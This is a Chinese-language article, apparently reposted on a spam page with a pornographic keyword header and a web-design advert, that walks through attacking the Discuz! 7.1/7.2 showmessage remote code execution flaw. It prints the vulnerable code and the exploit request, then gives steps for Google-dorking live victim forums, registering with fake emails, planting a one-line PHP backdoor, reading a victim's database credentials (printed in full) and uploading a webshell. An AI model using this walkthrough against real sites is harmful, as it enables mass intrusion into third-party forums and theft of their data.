日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

【.com 獨(dú)家特稿】Crossday Discuz! Board 論壇系統(tǒng)（簡(jiǎn)稱(chēng) Discuz! 論壇）是一個(gè)采用 PHP 和 MySQL 等其它多種數(shù)據(jù)庫(kù)構(gòu)建的高效論壇解決方案。作為商業(yè)軟件產(chǎn)品， Discuz! 在代碼質(zhì)量，運(yùn)行效率，負(fù)載能力，安全等級(jí)，功能可操控性和權(quán)限嚴(yán)密性等方面有著良好的口碑。對(duì)于站長(zhǎng)而言，利用 Discuz! 均能夠在最短的時(shí)間內(nèi)，花費(fèi)最低的費(fèi)用，采用最少的人力，架設(shè)一個(gè)性能優(yōu)異、功能全面、安全穩(wěn)定的社區(qū)論壇平臺(tái)。它能運(yùn)行于Windows平臺(tái)和Linux平臺(tái)，目前已經(jīng)有超過(guò)100萬(wàn)的用戶(hù)。在本文以前Discuz! 論壇即時(shí)有漏洞也因?yàn)榉N種原因難以獲取Webshell，而本次出現(xiàn)的漏洞只要是注冊(cè)用戶(hù)即可輕松獲取Webshell。在Discuz！ 7.1與7.2版本中的showmessage函數(shù)，由于eval中執(zhí)行的參數(shù)未初始化，可以任意提交，從而可以執(zhí)行任意PHP命令。該漏洞的首發(fā)是T00ls核心團(tuán)隊(duì)，下面來(lái)分析下這個(gè)遠(yuǎn)程代碼執(zhí)行漏洞，這個(gè)問(wèn)題真的很?chē)?yán)重，可以直接寫(xiě)shell。

創(chuàng)新互聯(lián)公司專(zhuān)注于企業(yè)營(yíng)銷(xiāo)型網(wǎng)站建設(shè)、網(wǎng)站重做改版、淳安網(wǎng)站定制設(shè)計(jì)、自適應(yīng)品牌網(wǎng)站建設(shè)、H5頁(yè)面制作、商城開(kāi)發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、外貿(mào)網(wǎng)站制作、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁(yè)設(shè)計(jì)等建站業(yè)務(wù)，價(jià)格優(yōu)惠性?xún)r(jià)比高，為淳安等各大城市提供網(wǎng)站開(kāi)發(fā)制作服務(wù)。

一、漏洞來(lái)自showmessage函數(shù)
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危險(xiǎn)的用法，未初始化的變量可以直接帶進(jìn)函數(shù)，直接導(dǎo)致了問(wèn)題產(chǎn)生，from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;

    define('CACHE_FORBIDDEN', TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
        if($fp = @fopen($statlogfile, 'a')) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message)."\n");
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = '';
        }
    }  
    if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }  
    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader("location: ".str_replace('&', '&', $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = '';
    }
    if(in_array($extra, array('HALTED', 'NOPERM'))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }
    include language('messages');
    $vars = explode(':', $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//兩個(gè)數(shù)字即可，用:分割
        eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化，可以自定義，from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? 'ajax_' : '';
        eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
        unset($pre);
    }
    ...... }

#p#

二、DZ的全局機(jī)制導(dǎo)致了未初始化的參數(shù)可以任意提交

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {

    foreach($$_request as $_key => $_value) {

        $_key{0} != '_' && $$_key = daddslashes($_value);

    }

}

#p#

三、misc.php正好有個(gè)可以自定義message的點(diǎn)，其實(shí)也是未初始化：

elseif($action == 'imme_binding' && $discuz_uid) {

    if(isemail($id)) {

        $msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");

        $msn = explode("\t", $msn);

        $id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));

        $msn = "$msn[0]\t$id";

        $db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");

        showmessage('msn_binding_succeed', 'memcp.php');

    } else {

        if($result == 'Declined') {

            dheader("Location: memcp.php");

        } else {

            showmessage($response['result']);//$response沒(méi)有初始化，可以自定義，from www.oldjun.com

        }

    }

   }

#p#

四、漏洞利用
showmessage函數(shù)里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，參數(shù)是兩個(gè)自定義的數(shù)組。注冊(cè)一個(gè)用戶(hù)登陸,然后提交misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

#p#

五、漏洞的具體應(yīng)用

1.搜索“Powered by Discuz!7.2”
在Google中進(jìn)行Discuz!7.2的定位搜索，在Google輸入框中輸入“Powered by Discuz!7.2 site:kr”搜索韓國(guó)的Discuz!7.2版本的站點(diǎn)，如圖1所示，結(jié)果出來(lái)有3380條記錄。想搜索哪個(gè)國(guó)家的就直接在site后面進(jìn)行變更，例如搜索國(guó)內(nèi)的網(wǎng)站：“site:com.cn”，政府網(wǎng)站“site:org.cn”。

圖1定位搜索Discuz!7.2版本的論壇

#p#

2.驗(yàn)證并注冊(cè)論壇用戶(hù)

在圖1中從第一個(gè)往最末記錄，依次打開(kāi)搜索記錄，如圖2所示，第一個(gè)記錄技能打開(kāi)，而且在其中還顯示為中文，單擊注冊(cè)鏈接，注冊(cè)為開(kāi)論壇的一個(gè)用戶(hù)。注冊(cè)用戶(hù)時(shí)用戶(hù)名和密碼可以隨意選取，只要不重復(fù)即可，如果不想接收網(wǎng)站的注冊(cè)信件，防止被他人利用電子郵件進(jìn)行其它活動(dòng)可以使用假的郵件地址，如圖3所示，總之目的只有一個(gè)那就是成為該論壇的會(huì)員，便于后期得到Webshell。

圖2 查看搜索結(jié)果

圖3 注冊(cè)用戶(hù)

#p#

3.修改exp代碼中的地址

discuz7.2 exp是由T00ls.net放出來(lái)的，呵呵，版權(quán)屬于他們哦！如圖4所示，在修改action的地址為“http://**********.co.kr/dc/misc.php”，該地址是misc.php的實(shí)際地址，修改完畢后保存即可。

圖4修改exp代碼中的地址

#p#

4.獲取TID并提交

用戶(hù)注冊(cè)成功后，在論壇中通過(guò)觀(guān)看最新帖子可以看到地址欄中包含有TID一項(xiàng)，例如“http://www.antian365.com/redirect.php?tid=5634&goto=lastpost#lastpost”，其中的tid為“5634”。Tid顧名思義就是帖子ID。獲取該ID后在exp中將該ID輸入后進(jìn)行提交，如圖5所示。

圖5 獲取tid并將其放入exp中進(jìn)行提交

技巧：
（1）在有些大的論壇中由于使用了優(yōu)化技術(shù)，因此論壇的頁(yè)面都是靜態(tài)的，在靜態(tài)的頁(yè)面中是看不到tid的，例如“http://bbs./thread-648810-1.html”，但當(dāng)鼠標(biāo)移動(dòng)到回復(fù)按鈕處時(shí)會(huì)給出一個(gè)地址，該地址中包含有tid。
（2）Exp提交成功后會(huì)出現(xiàn)一些提示，如果給出“Binding Failed.Visit MSN IMME Q&A,Please.”提示，如圖6所示，則說(shuō)明該系統(tǒng)已經(jīng)修補(bǔ)了漏洞或者采取了一些安全措施，無(wú)法再進(jìn)行利用。

圖6 未能成功的exp

（3）一句話(huà)木馬成功與否的測(cè)試。直接在論壇地址后加上“/forumdata/cache/usergroup_01.php”進(jìn)行訪(fǎng)問(wèn)，例如某網(wǎng)站的論壇地址為：
http://www.xxx.com.hk/discuz/，則一句話(huà)后門(mén)的地址為：
http://www.xxx.com.hk/discuz/forumdata/cache/usergroup_01.php
如果訪(fǎng)問(wèn)后未出現(xiàn)錯(cuò)誤提示，那么恭喜你，成功了！
#p#

5.獲取Webshell

如圖7所示，在“l(fā)anker一句話(huà)PHP后門(mén)客戶(hù)端3.0內(nèi)部版”的后門(mén)地址中輸入剛才提交的地址“http://**********.co.kr/dc/forumdata/cache/usergroup_01.php”，密碼是“cmd”。在模塊中選擇查看服務(wù)器基本信息，如圖7所示，獲悉該系統(tǒng)為linux系統(tǒng)以及該網(wǎng)站所在的文件路徑。

圖7 一句話(huà)后門(mén)執(zhí)行成功

#p#

6.讀取數(shù)據(jù)庫(kù)連接文件

在模塊中選擇讀取文件，并輸入數(shù)據(jù)庫(kù)連接文件的地址“****/dc/config.inc.php”，如圖8所示，成功獲取該論壇數(shù)據(jù)庫(kù)的敏感信息：
$dbhost = 'localhost'; // 數(shù)據(jù)庫(kù)服務(wù)器
$dbuser = 'skycheer'; // 數(shù)據(jù)庫(kù)用戶(hù)名
$dbpw = 'sky0127'; // 數(shù)據(jù)庫(kù)密碼
$dbname = 'skycheer'; // 數(shù)據(jù)庫(kù)名
$pconnect = 0;
 

圖8獲取論壇數(shù)據(jù)庫(kù)連接信息

#p#

7.上傳大馬

使用一句話(huà)管理實(shí)在是不方便，在功能模塊中選擇上傳文件，使用空的路徑直接將本地的大馬上傳到一句話(huà)木馬所在的路徑，上傳成功后直接訪(fǎng)問(wèn)，如圖9所示，成功得到我們熟悉的PhpSpy ver 2008界面。至此已經(jīng)獲取Discuz！7.2版本的Webshell，大家都知道Discuz！論壇的Webshell很難拿到，因此本漏洞的珍稀程度可想而知。

圖9 上傳大馬

#p#

8.后記

 Discuz！7.1&7.2遠(yuǎn)程溢出漏洞出來(lái)后，國(guó)內(nèi)有關(guān)Discuz！的大中小論壇基本沒(méi)有什么幸免，安全做的好的去掉了cache的執(zhí)行權(quán)限，將其權(quán)限設(shè)置為無(wú)，逃過(guò)劫難。

本文題目：DZ7.1and7.20遠(yuǎn)程代碼執(zhí)行漏洞獲取Webshell
瀏覽路徑：http://www.5511xx.com/article/coieijc.html